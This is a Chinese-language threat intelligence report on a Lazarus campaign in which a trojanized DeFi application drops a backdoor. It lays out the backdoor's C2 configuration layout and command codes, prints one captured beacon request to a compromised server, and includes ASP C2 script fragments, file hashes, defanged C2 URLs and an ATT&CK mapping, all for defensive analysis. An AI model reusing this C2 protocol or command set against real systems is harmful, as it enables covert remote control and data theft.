关键词
Lazarus、DeFi、后门
图2:恶意软件创建流程图
图3:应用程序截图
偏移 |
长度(字节) |
描述 |
0x00 |
4 |
标志C2操作开始 |
0x04 |
4 |
选择C2服务器的随机值 |
0x08 |
4 |
受害者ID的随机值 |
0x0C |
0x208 |
C2服务器地址 |
0x214 |
0x208 |
C2服务器地址 |
0x41C |
0x208 |
C2服务器地址 |
0x624 |
0x208 |
C2服务器地址 |
0x82C |
0x208 |
C2服务器地址 |
0xA34 |
0x464 |
存储系统信息的缓冲区 |
0xE98 |
0x400 |
Cmd.exe的完整路径 |
0x1298 |
0x400 |
临时文件夹路径 |
0x1698 |
8 |
后门操作开始时间点 |
0x16A0 |
4 |
时间间隔 |
0x16A4 |
4 |
收集逻辑驱动器信息的标志 |
0x16A8 |
8 |
枚举会话信息的标志 |
0x16B0 |
8 |
收集逻辑驱动器和会话信息的时间值 |
图4:jsessid参数结构
POST/include/inc.asp HTTP/1.1 Content-Type:application/x-www-form-urlencoded User-Agent:Mozilla/4.0(compatible;MSIE7.0;Windows NT6.1;WOW64;Trident/7.0;SLCC2;.NET CLR2.0.50727;.NET CLR3.5.30729;.NET CLR3.0.30729;Media Center PC6.0;.NET4.0C;.NET4.0E;InfoPath.3) Host:emsystec.com Content-Length:80 Cache-Control:no-cache jsessid=60d49d980163be8f00019f91&cookie=29f23f917ab01aa8lJ3UYA==2517757b7dfb47f1 |
命令 |
描述 |
0x60D49D97 |
用当前的时间间隔值(默认为10)设置时间配置 |
0x60D49D9F |
用C2服务器提供的数据来设置时间配置 |
0x60D49DA0 |
收集系统信息,如IP地址、计算机名称、操作系统版本、CPU架构等 |
0x60D49DA1 |
收集驱动器信息,包括类型和空闲空间大小 |
0x60D49DA2 |
枚举文件(含文件名、大小、时间) |
0x60D49DA3 |
枚举进程 |
0x60D49DA4 |
终止进程 |
0x60D49DA5 |
修改工作目录 |
0x60D49DA6 |
连接到指定IP地址 |
0x60D49DA7 |
文件时间戳 |
0x60D49DA8 |
执行Windows命令 |
0x60D49DA9 |
安全地删除一个文件 |
0x60D49DAA |
用CreateProcessW API启动进程 |
0x60D49DAB |
用CreateProcessAsUserW API启动进程 |
0x60D49DAC |
高完整性地启动进程 |
0x60D49DAD |
从C2服务器下载文件并保存到指定路径 |
0x60D49DAE |
发送文件创建时间和文件内容 |
0x60D49DAF |
将文件添加到.cab文件并将其发送到C2服务器 |
0x60D49DB0 |
收集指定路径下的文件列表 |
0x60D49DB1 |
发送配置到C2服务器 |
0x60D49DB2 |
从C2服务器接收新配置 |
0x60D49DB3 |
将配置设置为当前时间 |
0x60D49DB4 |
休眠0.1秒后继续执行 |
|
图5:C2脚本配置
-
lFlag:标志着有数据要交付给后门的信号 -
lBuffer:用于存储发送到后门的数据缓冲区 -
tFlag:标志着有一个来自后门的响应 -
tBuffer:用于存储从后门传入的数据缓冲区
msgID |
功能函数名 |
描述 |
60d49d98 |
TFConnect |
将'TID'值(受害者标识符)保存在日志文件中,再从配置文件(globals.jpg)中获取下一阶段的C2地址后,用客户端的IP地址发送'jcookie'值。将下一阶段服务器的响应转发给客户端。 |
60d49d99 |
TConnect |
将命令传递给后门: 如果lFlag是'true',将lBuffer发送到客户端。重置'lBuffer'并将lFlag设为'false'。否则,重置'tBuffer'并将tFlag设为'false'。 |
60d49d9a |
LConnect |
发送命令并返回命令执行结果。 将'lBuffer'值设置为'jcookie'参数,将'tBuffer'传递给客户端。 |
60d49d9c |
Check |
检索主机信息(计算机名称,操作系统版本)。其中,一个配置文件保存了C2的下一个阶段的地址。如果它存在的话则删除该文件,然后通过'jcookie'参数保存带有交付数据的新配置。 |
60d49d9d |
LogDown |
交付Base64编码后的日志文件,然后删除它。 |
the others |
N/A |
将具有未知/非预期msgID(请求类型)数据的连接写入日志文件,条目被标记为'xxxxxxx'。 |
图6:相同的后门switch结构
ThreatNeedle C2 script from |
C2 script of this case |
functIon getIpAddress() On ErroR resume next Dim ip ip = Request.SErVervariables("HTTP_CLIENT_IP") If ip = "" THen Ip = ReQUest.ServervaRiAbLes("HTTP_X_FORWARDED_FOR") If ip = "" ThEn ip = request.ServerVaRiables("REMOTE_ADDR") EndIf Endif GEtIpAdDress = ip EndFuNction |
fUnctioN GetIpAddress() ON Error Resume Next Dim iP ip = ReqUest.ServerVaRiables("HTTP_CLIENT_IP") If ip = "" THEn iP = Request.SErverVariaBleS("HTTP_X_FORWARDED_FOR") If ip = "" then ip = reQuest.ServErVariables("REMOTE_ADDR") EnDIF EnDIf GEtipAddreSs = ip EndFUnction |
ThreatNeedle C2 script from: |
C2 script of this case |
Sub writeDataToFile(strFileName, byData) Dim objFSO, objFile, strFilePath Const ForAppending = 8 strFilePath=Server.MapPath(".")&"" & strFileName Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.OpenTextFile(strFilePath, ForAppending, True) objFile.Write byData objFile.Close EndSub |
Sub WritedatA(filepath, byData) dim objFSO, oBJFile ConSt ForAppEnDing = 8 Set objFsO = CreateObject("Scripting.FileSystemObject") SeT objFIle = objFso.OpENTextFile(filepaTh, FoRAppending, True) objFilE.Write ByDatA objFIle.CLose EnDSub |
Trojanized DeFi application
0b9f4612cdfe763b3d8c8a956157474a DeFi-App.exe
Dropped backdoor
d65509f10b432f9bbeacfc39a3506e23 %ProgramData%MicrosoftGoogleChrome.exe
Similar backdoor
a4873ef95e6d76856aa9a43d56f639a4
d35a9babbd9589694deb4e87db222606
70bcafbb1939e45b841e68576a320603
3f4cf1a8a16e48a866aebd5697ec107b
b7092df99ece1cdb458259e0408983c7
8e302b5747ff1dcad301c136e9acb4b0
d90d267f81f108a89ad728b7ece38e70
47b73a47e26ba18f0dba217cb47c1e16
77ff51bfce3f018821e343c04c698c0e
First stage C2 servers (Legitimate, compromised)
hxxp://emsystec[.]com/include/inc[.]asp
hxxp://www[.]gyro3d[.]com/common/faq[.]asp
hxxp://www[.]newbusantour[.]co[.]kr/gallery/left[.]asp
hxxp://ilovesvc[.]com/HomePage1/Inquiry/privacy[.]asp
hxxp://www[.]syadplus[.]com/search/search_00[.]asp
hxxp://bn-cosmo[.]com/customer/board_replay[.]asp
Second stage C2 servers (Legitimate,compromised)
hxxp://softapp[.]co[.]kr/sub/cscenter/privacy[.]asp
hxxp://gyro3d[.]com/mypage/faq[.]asp
Tactic |
Technique |
Technique Name |
Execution |
T1204.002 |
User Execution: Malicious File |
Persistence |
T1547.001 |
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Defense Evasion |
T1070.004 |
Indicator Removal on Host: File Deletion |
T1070.006 |
Indicator Removal on Host: Timestomp |
|
Discovery |
T1057 |
Process Discovery |
T1082 |
System Information Discovery |
|
T1083 |
File and Directory Discovery |
|
T1124 |
System Time Discovery |
|
Command and Control |
T1071.001 |
Application Layer Protocol: Web Protocols |
T1573.001 |
Encrypted Channel: Symmetric Cryptography |
|
Exfiltration |
T1041 |
Exfiltration Over C2 Channel |
编辑|林卓庞
审校|何双泽、金矢
本文为CNTIC编译整理,不代表本公众号观点,转载请保留出处与链接。联系信息进入公众号后点击“关于我们”可见。
原文始发于微信公众号(国家网络威胁情报共享开放平台):Lazarus用于投递恶意软件的DeFi木马
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论